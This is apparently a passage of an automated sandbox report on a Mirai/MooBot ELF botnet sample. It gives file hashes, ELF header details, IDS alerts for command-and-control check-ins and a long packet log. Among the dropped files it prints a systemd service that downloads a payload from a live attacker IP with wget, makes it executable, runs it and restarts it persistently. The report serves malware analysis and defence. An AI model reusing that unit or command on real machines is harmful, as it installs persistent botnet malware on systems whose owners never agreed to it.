                                          • 91.200.103.117
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 91.200.103.117
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 91.200.103.117
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 91.200.103.117
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 91.200.103.117
                                          7QiAmg58Jk.exeGet hashmaliciousMetasploit, Meterpreter, XmrigBrowse
                                          • 194.59.31.31
                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                          • 194.59.31.225
                                          No context
                                          No context
                                          Process:/tmp/na.elf
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):296
                                          Entropy (8bit):5.0752139838196015
                                          Encrypted:false
                                          SSDEEP:6:z80WuKyRZAMzdK+ann0RJ5R0qG2+GWRo3N+GWRuwuOp+GWRQCdUO9LQmWA4Rv:zNRZAOK+aniRdG2+GWRg+GWRuwjp+GWo
                                          MD5:EB5FC98B0D0D204A1CB963EBD192AEAF
                                          SHA1:3D70C62A728D5F8B8B9B438B754F467E825B1ED9
                                          SHA-256:FA2A136387978EC899EA6D4412E6593550A467534F022935C7B232482402374D
                                          SHA-512:92028A49B1C373A716F1AD6877296D0DDE4C83E625DC3DAFC375F349C836D81F7F8C0A427BF9FD7BD6D4C03FBBC8361A6FF72C7B1D2143932596CDF1E48F2EF5
                                          Malicious:false
                                          Reputation:low
                                          Preview:[Unit].Description=Custom Sech Binary.After=network.target..[Service].ExecStart=/usr/bin/wget -O /tmp/bolu http://91.200.103.117/bolubotnetsh4.ExecStartPost=/bin/chmod +x /tmp/bolu.ExecStartPost=/tmp/bolu (null).ExecStartPost=rm -rf /tmp/bolu.Restart=always..[Install].WantedBy=multi-user.target.
                                          Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):76
                                          Entropy (8bit):3.7627880354948586
                                          Encrypted:false
                                          SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                          MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                          SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                          SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                          SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                          Process:/tmp/na.elf
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):27
                                          Entropy (8bit):3.8100810205217304
                                          Encrypted:false
                                          SSDEEP:3:TgBDlT1N:TgB11N
                                          MD5:2E8B62CD5B9D6203300E1A0F79554430
                                          SHA1:B6FC563BCA171C6DFA5A420C367F090C08635F4D
                                          SHA-256:54E95E1B4FCA83E6C469DA79E05EC42CB5F190B5731F28A9DFF280136B7DCFA6
                                          SHA-512:81AA2A256AB3B2318A60A089336AB73F5257EF7F292F18A37EC069D7FDE400763D7BFA3D89586B610C80715A2443849E679559EB14DBF7C769869AA908067541
                                          Malicious:false
                                          Reputation:low
                                          Preview:/tmp/na.elf./tmp/nwlrbbmqbh
                                          File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
                                          Entropy (8bit):6.269781769889728
                                          TrID:
                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                          File name:na.elf
                                          File size:125'284 bytes
                                          MD5:8a1de97bd5a302571f7cd7cd23ac8ad6
                                          SHA1:09304aa19c1ff458218098799e844f51e67f671c
                                          SHA256:8e05d02bfd535a557c2691defd2d30b8d7599e952a06247c7e44554fad54c25a
                                          SHA512:510647d6f8291fcac13a7a7616a429ae432f3caf4a9b027d697b2ccd5dbb97a1803a650582858ea2124a5e0054e9baffd191b97e2a92d9432ae1467ca0861e7c
                                          SSDEEP:1536:VaQwt2WOypOJl76R54UqQK0CLKQ0ytHEePVrNVm/W/Zbi9ghp5J1p:VnpKUlQuUpLQeePVrm/WRbi+5J1
                                          TLSH:99C35B77C8296EA8C654D674F0708F781F93A91581471FBE69A7C2B98043D8DF60A3F8
                                          File Content Preview:.ELF..............*.......@.4...........4. ...(...............@...@...........................B...B.LI..............Q.td............................././"O.n........#.*@........#.*@.t...o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

                                          ELF header

                                          Class:ELF32
                                          Data:2's complement, little endian
                                          Version:1 (current)
                                          Machine:<unknown>
                                          Version Number:0x1
                                          Type:EXEC (Executable file)
                                          OS/ABI:UNIX - System V
                                          ABI Version:0
                                          Entry Point Address:0x4001a0
                                          Flags:0x9
                                          ELF Header Size:52
                                          Program Header Offset:52
                                          Program Header Size:32
                                          Number of Program Headers:3
                                          Section Header Offset:124844
                                          Section Header Size:40
                                          Number of Section Headers:11
                                          Header String Table Index:10
                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                          NULL0x00x00x00x00x0000
                                          .initPROGBITS0x4000940x940x300x00x6AX004
                                          .textPROGBITS0x4000e00xe00x175000x00x6AX0032
                                          .finiPROGBITS0x4175e00x175e00x240x00x6AX004
                                          .rodataPROGBITS0x4176040x176040x28140x00x2A004
                                          .ctorsPROGBITS0x429e1c0x19e1c0xc0x00x3WA004
                                          .dtorsPROGBITS0x429e280x19e280x80x00x3WA004
                                          .dataPROGBITS0x429e400x19e400x49140x00x3WA0032
                                          .gotPROGBITS0x42e7540x1e7540x140x40x3WA004
                                          .bssNOBITS0x42e7680x1e7680x86bc0x00x3WA004
                                          .shstrtabSTRTAB0x00x1e7680x430x00x0001
                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                          LOAD0x00x4000000x4000000x19e180x19e186.90160x5R E0x10000.init .text .fini .rodata
                                          LOAD0x19e1c0x429e1c0x429e1c0x494c0xd0080.41660x6RW 0x10000.ctors .dtors .data .got .bss
                                          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-10-07T16:31:45.189681+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154160891.200.103.11723561TCP
                                          2024-10-07T16:31:53.036571+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154161091.200.103.11723561TCP
                                          2024-10-07T16:32:00.705827+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154161291.200.103.11723561TCP
                                          2024-10-07T16:32:10.330861+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154161491.200.103.11723561TCP
                                          2024-10-07T16:32:15.987943+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154161691.200.103.11723561TCP
                                          2024-10-07T16:32:24.610745+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154161891.200.103.11723561TCP
                                          2024-10-07T16:32:31.298035+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154162091.200.103.11723561TCP
                                          2024-10-07T16:32:42.946301+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154162291.200.103.11723561TCP
                                          2024-10-07T16:32:50.890356+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154162491.200.103.11723561TCP
                                          2024-10-07T16:32:59.891429+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154162691.200.103.11723561TCP
                                          2024-10-07T16:33:02.550490+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154162891.200.103.11723561TCP
                                          2024-10-07T16:33:12.194881+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154163091.200.103.11723561TCP
                                          2024-10-07T16:33:16.817515+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154163291.200.103.11723561TCP
                                          2024-10-07T16:33:27.443917+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154163491.200.103.11723561TCP
                                          2024-10-07T16:33:39.091874+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154163691.200.103.11723561TCP
                                          2024-10-07T16:33:50.745630+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154163891.200.103.11723561TCP
                                          2024-10-07T16:34:02.369016+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154164091.200.103.11723561TCP
                                          2024-10-07T16:34:06.661195+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154164291.200.103.11723561TCP
                                          2024-10-07T16:34:11.338918+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154164491.200.103.11723561TCP
                                          2024-10-07T16:34:16.859216+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154164691.200.103.11723561TCP
                                          2024-10-07T16:34:28.107543+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154164891.200.103.11723561TCP
                                          2024-10-07T16:34:35.957045+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154165091.200.103.11723561TCP
                                          2024-10-07T16:34:41.757202+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154165291.200.103.11723561TCP
                                          2024-10-07T16:34:50.505061+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154165491.200.103.11723561TCP
                                          2024-10-07T16:34:53.266633+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154165691.200.103.11723561TCP
                                          2024-10-07T16:35:00.092749+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154165891.200.103.11723561TCP
                                          2024-10-07T16:35:04.809191+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154166091.200.103.11723561TCP
                                          2024-10-07T16:35:13.498789+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154166291.200.103.11723561TCP
                                          2024-10-07T16:35:18.279983+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154166491.200.103.11723561TCP
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 7, 2024 16:31:45.181525946 CEST4160823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:31:45.186799049 CEST235614160891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:31:45.186870098 CEST4160823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:31:45.189681053 CEST4160823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:31:45.194478035 CEST235614160891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:31:46.794740915 CEST235614160891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:31:46.795269012 CEST4160823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:31:46.800431013 CEST235614160891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:31:53.029423952 CEST4161023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:31:53.034523964 CEST235614161091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:31:53.034805059 CEST4161023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:31:53.036571026 CEST4161023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:31:53.041349888 CEST235614161091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:31:54.675472975 CEST235614161091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:31:54.677212954 CEST4161023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:31:54.682040930 CEST235614161091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:00.699976921 CEST4161223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:00.705133915 CEST235614161291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:00.705197096 CEST4161223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:00.705826998 CEST4161223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:00.711153030 CEST235614161291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:02.313918114 CEST235614161291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:02.314215899 CEST4161223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:02.320907116 CEST235614161291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:10.324544907 CEST4161423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:10.329463959 CEST235614161491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:10.329524994 CEST4161423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:10.330861092 CEST4161423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:10.335644960 CEST235614161491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:11.972323895 CEST235614161491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:11.972500086 CEST4161423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:11.977684975 CEST235614161491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:15.982069016 CEST4161623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:15.987072945 CEST235614161691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:15.987194061 CEST4161623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:15.987942934 CEST4161623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:15.992755890 CEST235614161691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:17.593966007 CEST235614161691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:17.594177961 CEST4161623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:17.599338055 CEST235614161691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:24.604713917 CEST4161823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:24.609690905 CEST235614161891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:24.609755039 CEST4161823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:24.610744953 CEST4161823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:24.615717888 CEST235614161891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:26.275882006 CEST235614161891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:26.276077986 CEST4161823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:26.281907082 CEST235614161891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:31.287163019 CEST4162023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:31.297270060 CEST235614162091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:31.297353029 CEST4162023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:31.298034906 CEST4162023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:31.304357052 CEST235614162091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:32.931293964 CEST235614162091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:32.931432962 CEST4162023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:32.940673113 CEST235614162091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:42.940751076 CEST4162223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:42.945559025 CEST235614162291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:42.945616961 CEST4162223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:42.946300983 CEST4162223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:42.951118946 CEST235614162291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:44.873644114 CEST235614162291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:44.873807907 CEST4162223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:44.874315023 CEST235614162291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:44.874357939 CEST4162223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:45.085206032 CEST4162223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:45.127347946 CEST235614162291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:45.127449036 CEST4162223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:45.131001949 CEST235614162291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:45.131087065 CEST235614162291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:45.131160021 CEST4162223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:50.884111881 CEST4162423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:50.889061928 CEST235614162491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:50.889158964 CEST4162423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:50.890356064 CEST4162423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:50.895167112 CEST235614162491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:52.749303102 CEST235614162491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:52.749470949 CEST4162423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:52.754477024 CEST235614162491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:59.881634951 CEST4162623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:59.887689114 CEST235614162691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:32:59.887761116 CEST4162623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:59.891428947 CEST4162623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:32:59.896300077 CEST235614162691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:01.534236908 CEST235614162691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:01.534450054 CEST4162623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:01.539321899 CEST235614162691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:02.544827938 CEST4162823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:02.549709082 CEST235614162891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:02.549772978 CEST4162823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:02.550489902 CEST4162823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:02.555404902 CEST235614162891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:04.176995039 CEST235614162891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:04.177237034 CEST4162823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:04.182574034 CEST235614162891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:12.188164949 CEST4163023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:12.193116903 CEST235614163091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:12.193324089 CEST4163023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:12.194880962 CEST4163023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:12.199763060 CEST235614163091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:13.800381899 CEST235614163091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:13.800607920 CEST4163023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:13.805635929 CEST235614163091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:16.811295033 CEST4163223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:16.816179037 CEST235614163291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:16.816260099 CEST4163223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:16.817514896 CEST4163223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:16.822407961 CEST235614163291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:18.425873041 CEST235614163291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:18.426032066 CEST4163223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:18.430854082 CEST235614163291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:27.437891960 CEST4163423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:27.442786932 CEST235614163491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:27.442867994 CEST4163423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:27.443917036 CEST4163423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:27.449095964 CEST235614163491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:29.069991112 CEST235614163491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:29.070182085 CEST4163423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:29.077950954 CEST235614163491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:39.084094048 CEST4163623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:39.089207888 CEST235614163691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:39.089452982 CEST4163623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:39.091873884 CEST4163623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:39.096784115 CEST235614163691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:40.722799063 CEST235614163691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:40.723407984 CEST4163623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:40.728193998 CEST235614163691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:50.735011101 CEST4163823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:50.740048885 CEST235614163891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:50.740206003 CEST4163823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:50.745630026 CEST4163823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:50.750498056 CEST235614163891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:52.347522974 CEST235614163891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:33:52.347703934 CEST4163823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:33:52.352502108 CEST235614163891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:02.363337994 CEST4164023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:02.368298054 CEST235614164091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:02.368365049 CEST4164023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:02.369015932 CEST4164023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:02.375842094 CEST235614164091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:04.633889914 CEST235614164091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:04.634062052 CEST4164023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:04.637595892 CEST235614164091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:04.637701035 CEST4164023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:04.638375044 CEST235614164091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:04.638454914 CEST4164023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:04.642400980 CEST235614164091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:06.655287027 CEST4164223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:06.660365105 CEST235614164291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:06.660465956 CEST4164223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:06.661195040 CEST4164223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:06.666322947 CEST235614164291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:08.320200920 CEST235614164291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:08.320385933 CEST4164223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:08.325597048 CEST235614164291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:11.332539082 CEST4164423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:11.337392092 CEST235614164491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:11.337450981 CEST4164423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:11.338917971 CEST4164423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:11.343791008 CEST235614164491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:13.841047049 CEST235614164491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:13.841272116 CEST4164423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:13.841372967 CEST235614164491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:13.841435909 CEST4164423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:13.841794014 CEST235614164491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:13.841840982 CEST4164423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:13.846302032 CEST235614164491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:16.852857113 CEST4164623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:16.857881069 CEST235614164691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:16.858153105 CEST4164623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:16.859215975 CEST4164623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:16.864068985 CEST235614164691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:18.492832899 CEST235614164691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:18.493100882 CEST4164623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:18.498022079 CEST235614164691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:28.001591921 CEST4164823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:28.006896019 CEST235614164891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:28.009445906 CEST4164823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:28.107542992 CEST4164823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:28.112396955 CEST235614164891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:29.852464914 CEST235614164891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:29.852854013 CEST4164823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:29.857637882 CEST235614164891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:35.951405048 CEST4165023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:35.956232071 CEST235614165091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:35.956368923 CEST4165023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:35.957045078 CEST4165023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:35.961844921 CEST235614165091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:37.739141941 CEST235614165091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:37.739345074 CEST4165023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:37.744431019 CEST235614165091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:41.751789093 CEST4165223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:41.756580114 CEST235614165291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:41.756629944 CEST4165223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:41.757201910 CEST4165223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:41.761945009 CEST235614165291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:43.483992100 CEST235614165291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:43.484236956 CEST4165223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:43.489440918 CEST235614165291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:50.498977900 CEST4165423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:50.503834009 CEST235614165491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:50.503899097 CEST4165423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:50.505060911 CEST4165423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:50.509984970 CEST235614165491.200.103.117192.168.2.15
